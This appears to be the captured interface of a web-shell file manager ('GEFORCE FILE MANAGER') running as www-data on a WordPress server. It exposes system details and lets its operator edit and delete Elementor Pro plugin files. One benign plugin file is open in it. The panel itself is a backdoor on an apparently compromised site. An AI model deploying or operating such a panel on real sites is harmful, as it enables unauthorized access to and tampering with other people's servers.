[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
elementor-pro
/
base
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 base-carousel-trait.php
38,648 B
SET
[ EDIT ]
|
[ DEL ]
📄 base-widget-trait.php
329 B
SET
[ EDIT ]
|
[ DEL ]
📄 base-widget.php
259 B
SET
[ EDIT ]
|
[ DEL ]
📄 editor-one-trait.php
270 B
SET
[ EDIT ]
|
[ DEL ]
📄 module-base.php
332 B
SET
[ EDIT ]
|
[ DEL ]
📄 on-import-trait.php
3,989 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: base-widget-trait.php
<?php namespace ElementorPro\Base; use ElementorPro\License\API as License_API; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly } trait Base_Widget_Trait { public function is_editable() { return License_API::is_license_active(); } public function get_categories() { return [ 'pro-elements' ]; } }